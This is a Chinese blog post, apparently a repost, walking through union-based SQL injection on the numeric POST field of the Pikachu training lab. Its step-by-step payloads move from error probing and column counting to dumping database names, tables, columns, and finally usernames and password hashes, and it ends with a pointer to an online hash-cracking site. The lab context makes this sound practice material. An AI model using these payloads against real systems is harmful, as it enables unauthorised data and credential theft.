码迷,mamicode.com
首页 > 数据库 > 详细

不使用burp suite-SQL注入-union注入(联合查询)-pikachu之数字型注入(post)

时间:2020-02-13 09:18:05      阅读:47      评论:0      收藏:0      [点我收藏+]

标签:order   ima   orm   base   取数   where   报错   word   href   

pikachu之数字型注入(post)

技术图片

 

 

 技术图片

 

 

 

下面输入内容均为Post data内容

id=3‘&submit=%E6%9F%A5%E8%AF%A2   ------报错

 技术图片

id=3 and 1=1&submit=%E6%9F%A5%E8%AF%A2   ---正常

 技术图片

id=3 and 1=2&submit=%E6%9F%A5%E8%AF%A2   ----报错

 技术图片

id=3 order by 3&submit=%E6%9F%A5%E8%AF%A2   ---报错

 技术图片

id=3 order by 2&submit=%E6%9F%A5%E8%AF%A2  --正常   证明可以查找的是两个字段

 技术图片

id=-3 union select 1,2&submit=%E6%9F%A5%E8%AF%A2    -----   负3表示隐藏

 技术图片

id=-3 union select user(),database()&submit=%E6%9F%A5%E8%AF%A2  ---获取当前用户和数据库名称

 技术图片

id=-3 union select version(),database()&submit=%E6%9F%A5%E8%AF%A2    --获取数据库版本

 技术图片

id=1 and 1=2 union select group_concat(‘<br/>‘,table_name),database() from information_schema.tables where table_schema=database()  &submit=%E6%9F%A5%E8%AF%A2        ----获取表名

 技术图片

id=1 and 1=2 union select group_concat(‘<br/>‘,column_name),database() from information_schema.columns where table_schema=database() and table_name=‘users‘ &submit=%E6%9F%A5%E8%AF%A2        ---获取字段(以表users举例)

 技术图片

id=1 and 1=2 union select group_concat(‘<br/>‘,username),group_concat(‘<br/>‘,password) from users&submit=%E6%9F%A5%E8%AF%A2      ---获取字段username,password

 技术图片

https://www.cmd5.com/    把密码复制到这个网站进行解密可以得到明文

 

不使用burp suite-SQL注入-union注入(联合查询)-pikachu之数字型注入(post)

标签:order   ima   orm   base   取数   where   报错   word   href   

原文地址:https://www.cnblogs.com/mrlpl/p/12302034.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!